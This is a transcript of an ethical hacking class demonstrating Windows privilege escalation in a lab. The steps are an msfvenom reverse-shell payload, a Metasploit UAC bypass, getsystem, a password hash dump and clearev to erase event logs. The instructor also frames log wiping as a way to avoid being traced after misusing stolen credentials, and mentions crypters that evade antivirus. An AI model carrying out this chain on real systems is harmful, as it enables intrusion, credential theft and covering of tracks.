Welcome to today's certified ethical hacking. I hope you are able to hear me and able to see the screen here. So, so in the last session, I guess we discussed about system hacking. We did one practical, and I asked every one of you to do the practical of privilege escalation, right? The last task, the last assignment was to do privilege escalation from system hacking using Metasploit. So how many of you did the particular practical? Anyone? Tried but unsuccessful. Okay, what about others? Okay, so let's do one thing then. We'll be doing the same practical today for system hacking privilege escalation. So this privilege escalation is the process where once we gain access, we get ourselves normal user. Sorry, just give me a moment. Okay, okay, yeah. So let's start. Let's go to iLabs and do the particular practical on privilege escalation. So yeah, once we gain access using Metasploit in a particular system, we get normal user access. Okay, and because of that, we we don't have any kind of access to download files, edit files, see passwords, and many more things. For that, we need authority access. And for authority access, we need privilege escalation payload to be injected in the victim system. The process will be same, only an extra payload we need to inject in the software, the virus which we'll be creating. Okay, so let's start. Let's log into the iLabs and let's see how it is done. So Metasploit is already clear to every one of you that how Metasploit works, right? And yes, the few commands I will be sharing after we do the privilege escalation practical, the commands for screenshots, webcams, and all, okay, which you can use, which you can try from your side. Okay, after privilege escalation, you can dump the password of the user. Like suppose I'm able to hack Windows 10 user with the help of Metasploit. I can dump the password of the user, like whatever password is there of the particular user, I can see that. I can see the files and folders of the victim's computer. I can see text files, what is inside the text file. I can delete it, I can edit it. These things we can do after getting the authority access. Okay, so let's log in here. Okay, so let's go through the summarization summary first for this lab scenario. So performing privilege escalation to gain higher privileges. Okay, so once we gain access using Metasploit, we get normal privileges. Now we need to gain higher privileges. So what exactly happens? Let me explain you first. Right now, we will be controlling the system remotely, correct? Once we hack someone with the help of Metasploit, we will be controlling the system remotely. And to control a system remotely, you need authority access. There are different levels of accesses like user access, admin access, authority access. Authority access is the highest privilege you can get. Okay, with the help of authority access, you can edit, see, delete files or folders. You can see the configurations of the system like passwords, settings, firewall. You can disable the firewall, enable the firewall. You can disable a software. You can kill a task. So these things you can do with the help of authority access. Okay, you can kill a task with admin access also, but not tasks like antivirus, shutting down the system. For these you need authority access. Okay, so what we'll be doing is we will be simply creating the same payload which we did in the Metasploit. This is the command for that. So if you remember, we used MSF Venom, correct? So MSF Venom -p means the payload, Windows, interpreter, reverse underscore TCP, platform, architecture, encryption, binary, then the L host, which means our IP address, hyphen format will be exe, and the output will be on the folder file location where we want to save it, and enter. Now this will generate a payload. So any one of you can see any difference in this command and the previous command? Anyone? Like previously we used the same as MSF Venom, but how many of you can tell me the difference between the previous one and this one? Okay, so the difference is the hyphen E encoder. This hyphen E stands for encoder, and the encoder here we are using is Shikata GANAI. Okay, this is a kind of encoding format which is used to encode the whole software so that it can easily affect the system. Okay, and hyphen B the binary. Okay, so in this binary, this XOO will be skipped. Okay, so this is a kind of extra you can say flag values hyphen E and hyphen B, which is optional in the case of just getting normal access. But if you want to uh, escalate the privileges, if you want higher authority access, you need to create payload with the help of these two flag values. Okay, once we are done with this, we'll do the same steps, we'll do the same exploitation steps, but one extra step is to add a new payload. The new payload is known as, let me show you. So this is the normal payload, set payload, Windows interpreter, reverse TCP. Then one extra payload we need to use, that is this one. Use Exploit Windows local bypass user access control for helper. Okay, this is the exploit. Okay, so once we hack the system, once we exploit it, we will run the session in the background and we'll use the exploit again. Once we use this exploit will make sure that we bypass the user access control, and then we'll be able to gain ourselves as a authority access, and then we set the payload again, and that's it. This is what we need to do. So let's start from the beginning. First thing is to make the payload. Okay, so let's log into Kali Parrot. So sudo su, just let's make ourselves as root user. Just wait for a moment. Okay, so we are now the super user here. So let's directly dive into the msf venom command. Msf venom -p Windows interpreter devos underscore tcp hyphen platform, and hyphen platform, that will be Windows, hyphen A 86, encoder 86. Okay, so the output we need to save on desktop, and this file name we can give as exploit.exe. That's it. Let's hit enter. Let's wait for a moment. So it is getting generated, you can see here, right? Okay, now it's done. So the payload is generated successfully. Now what's the next step? The next step is to share it with the victim, right? And how can we do that? We need to upload it somewhere, okay? And in our case, it will be on the Apache web server, correct? So we need to upload it in the HTML share folder. So let's see if the HTML share folder is there or not. So cd where HTML. So the share folder is not here. So we'll make it mkdir share, and we have our share folder here. Okay. So we can also upload it here also instead of creating a folder, but it's better to create a new folder to save the software. So it's done. Share folder is done. So now we need to share it on the web with Apache server. So we need to make it change the permissions, right? Permissions like anyone on the internet or in the network can access it. And for that, we need to change the mod to read, write, and execute. So the permission code for read, write, execute is 755. 755 share. So you see, it's now done. Ch own -r. So you'll be sharing it on the web. So we need to give the user access for www World Wide Web. Done. You see, earlier it was root, and right now it is www data. Now it's done. Now next command is to simply paste it in the particular folder. Okay. Okay, one more command we need to do is we need to give it the share permission. Okay, so you can see the 9th command here, 9th line. You can also just skip this step. Now let's copy the particular exploit software from the desktop to this folder. So it was in home, attacker, desktop, exploit, and we need to paste it in the share. Let's now check. Yeah, it's now here. Okay, now it's here. The next step is to start the Apache server. Service Apache to start. Okay, so as I asked every one of you that who tried this particular practical, so I got a reply like you tried, but somehow it was unsuccessful. So you need to let me know also on which step you missed something. Okay, like I'm following each and every step same mentioned in the iLab. So let me know where you got the error and how you missed it. Okay, so that I can check into it. So service Apache to start. So we are starting the Apache server here, and you see the Apache server is now started. Okay, you can verify this by going to the Windows 10, okay, and accessing the IP address which is 10.10.10.13, the IP address of parent. But you will see the exploit will be visible there. Okay, so let's now start the metasploit. Everything is done. We are done with creating a payload. We are done with sharing it. Now we need to run the metasploit. Okay, so for that we need to just run the msf console. Let's wait for the metasploit to run. Okay, so now we are into the msf console metasploit. So first step is to set the payload as usual. So set payload, sorry, first use the exploit. So use exploit multi-handler, then set the payload as usual. Which one? Reverse TCP, right? Windows, meterpreter, reverse TCP. Now set the lhost IP address to our IP address, which is this. Done. Now let's see the options. So in the options, you can see lhost is set, lport is also set to 4444 by default. It is there. Okay. So I think IP, everything is fine here. Okay, yeah. So everything is fine here. Okay. Now, what we do, we type exploit. Okay. But here we need to do it like this: exploit hyphen j hyphen z. So what is this hyphen j hyphen z? It is to make sure that once the exploit runs, it runs in the background also, because we need to use multiple exploit. And in order to use a new exploit, we need to put the previous exploit in the background process. For that, we use exploit hyphen j hyphen z. Now you see exploit running as a background job, exploit completed, but no sessions was created. So in order to create this session, what do? We go to the Windows and install the software, the payload which we have created. Okay. So Okay, so now we type the IP address or the location. In your case, it might be different. Share. This is the file which we uploaded. Okay, just download it, save it. Now, once it is saved, just run it. Okay, now it is successfully installed. What we need to do is we just need to go to the parent operating system and check if we got a session or not. Okay, let's go back to the particular parent. And what we see is we got one session from 10.10.10 IP address from Windows 10, which means our exploit is successful and the system is under our control. Okay, I hope till now it is clear to every one of you. Okay, so in order to communicate with this session, like as I told you, we used exploit -j-z to run it as a background job. So we need to start or select the background job. And for that, we need to use this command, sessions -i1, which means the first session or the first background activity we need to select. So once we hit enter, you see it's showing as starting interacting with one, which means now we are interacting with the first session. Okay, so now you can just get the system ID, get UID, the details about the system. Like you can see Windows 10 admin. Now we are admin and we need to make ourselves as authority. Why? Let me tell you. Just wait. Okay. So there are certain limitations of the commands like pwd dump. We cannot dump the password. Okay. We cannot see the particular files and folders. Okay. There's a command to check that. Just wait. Yeah, this is the hash dump. This one. This command we need to run. This command is used to do what? To check the Windows password, the hash dump. All the password saved in a Windows is saved in a hash format, not clear text, hash format. That hash format is also very, very important because we can decrypt the hash and get the clear text password. So for that, we need to run post Windows gather smart hash dump. So you see that it started running, everything was successful, but in the last, it's saying as insufficient privileges to dump hashes. We don't have the required privileges. Or clear EV. What is this? Well, as you know, we discussed about clearing the drafts and clearing the logs also, right? This clear EV is used to clear all the logs, all the events getting created on the victim system remotely. Let's try. You see, operation failed, access is denied, which means all the event, EV stands for events, clear events. All those events are still visible in the victim's computer. If we do something wrong here, if we copy someone's password, if we save someone's credit card details, if it is saved in a system and we misuse it, they can easily track you because your IP address, your details, everything is saved in the victim's computer as a log. And without this command, you cannot delete the logs or clear the logs. Got it? So whatever you do, you need to escalate your privileges so that you can do these kind of advanced commands. Okay. So the command to get the authority access is get system hyphen t1. Get system hyphen t1 is used to make yourself as an authority access or the highest one. But you see, it is failed. Why? Because we don't have that much of access. And let's see how to get the access and the privileges, and then how to make yourself as authority. Okay, let's start. So we'll make this activity as a background activity. So background. Okay, so just type background, hit enter. This session is now in the background. Okay, once the session is in the background, we need to use the new payload, new exploit which we discussed about. That is this one, use exploit Windows local bypass user access control for helper. Press enter. Now you see, we are using this particular exploit. Okay, now we need to configure all the options here. So show options. So here we need to set the session ID, that with which session you want to use the exploit. So we need to set the session ID. Set session 1. The background session was session 1. So we need to use this exploit with session 1. Hit enter. Again, see the options. You see, now it is showing 1 here, which means we are using this exploit for the first session. lhost as usual 10.10.10.13 and lport as usual 4444. So everything is okay here. Let's cross check. Target is also okay, Windows 86 architecture. And that's it, we are done. Okay. Now set the payload again back to previous Windows metapleter, because we need to interact with that payload only. So metapleter, reverse TCP. Now let's see the options again. Everything is okay or not? The session ID is set to 1. lhost is okay. lport is also okay. So lhost option is required. So lhost is okay. Okay, so everything is okay here. lhost is set to this IP address and set the target. So target is also set to 0, but let's again make sure and set it to 0. So yeah, it's 0 and everything is fine here. So let's now type exploit. Okay, because it's a long commands and steps, so we must not miss anything. Okay, so everything is done. Now type exploit. So what you see, everything is successfully done. So user access control is enabled. Okay, we are now the part of administrator group. UAC is set to default. Bypass user access control can bypass this setting, and now it is done. And registry keys are also cleared up. Now we are officially having the highest access, but still we need to trigger it. Like if you check get UID, we are still admin. And to make ourselves what? The authority, we need to use this get system hyphen T 1. Okay. Now just enter. Okay, command is wrong, I think. Just wait. Just try the get system only. Sometimes it doesn't work. Get system. Okay, now we are the authority right now. Let's check. Get UID. What you see? We are the anti-authority system, which means we are not the admin or the user anymore. We are the authority user, which means we have all the access. Okay, so in order to make sure that we have the access, let's try the first command. The command was what? The command was to dump the hashes, the password, right? So let's see. So run post windows gather smart hash dump. Hit enter. So what you see, we are having all the hashes of all the users of this system. There was one user, Sheila, Jason, Martin, administrator. So all the hashes, it's visible here. Okay. Now these hashes we need to decrypt in order to get the clear text password. That is a separate lab. You will learn in a separate lab like how to decrypt the hashes. But hashes are the main thing. Okay, you can copy the hash, you can save the hash, and you can use other tools known as like Rainbow, Password Cracker, and tools like this, like John the Ripper, which we'll see in our coming practicals, coming modules. There you can simply put this hash and get the clear password. Right now we are able to dump the password. Clear? Now let's try the clear event command. Clear event. Let's see. You see, all the records are wiped up. There are no records visible. Okay. Once the Windows 10 user will check about the events, let me show you. Whatever events it was created, it's now gone. Let me show you. This is the event viewer app, which is there by default in every system. I see custom. There is no events. Nothing is here. No events. Because everything is wiped up. You see, like you will see everything in here, but nothing is visible. Why? Because it's all deleted by the parent operating system with the help of clear EV command. Okay, that this is how we use the commands after getting the privilege escalations to the authority. Okay, so anyone having any doubts in here, let me know. How this session get break? Uh, well, if I'm right, what we're asking, then suppose if user disconnects from the internet, then you will lose the access. Anyone else? Any questions? Windows PowerShell is a different thing. Well, you can use when will be covering our upcoming modules. There, in the malware threats, you will be learning how to create a malware and how to use it to control the PowerShells, scripts, and all. Okay, that's in our upcoming modules in the malware threats. Reverse shell is a kind of script thing. That's a totally different thing you are asking about. Yes, as of now, the only way to gain access is once they install our exploit. Okay, but there are other ways also. There are other ways also where they don't need to install any exploit. We can directly hack them. That will be covering up in the upcoming modules. If Windows Defender is running, well, there are different uh, uh, techniques using which you can make your virus undetectable. Okay, there is a thing known as uh, cryptor. What is cryptor? Cryptor is basically a kind of you can say a tool or a process where we make our viruses or malwares undetectable, which means no antivirus or no Windows Defender will be able to detect it. That's our last topic of this course. There you will learn how to crypt your virus so that no one will be able to detect it. So even if the Windows Defender is on, nothing will happen. If victim defines, no, if the victim removes the malware, like the only way to remove is to format the system. Then obviously you cannot do anything, right? If the malware is removed, you will lose the access. Okay. So this is how we escalate our privileges. So I hope you can try it on your own also. So just try to perform the practical of privilege escalation. And in the next session, we'll see the practical on how to gain the remote access without using the exploit. Okay. In the next practical, we'll see how to remotely gain access without using the exploit. That's it for today's session, everyone. I hope you liked it. We'll meet again in the next class with the next practical. Okay. Thank you for joining. You can now leave the class and have a good day ahead. Mobile hacking is in 17th or 18th module, not now. Okay. Thank you, everyone. Bye bye.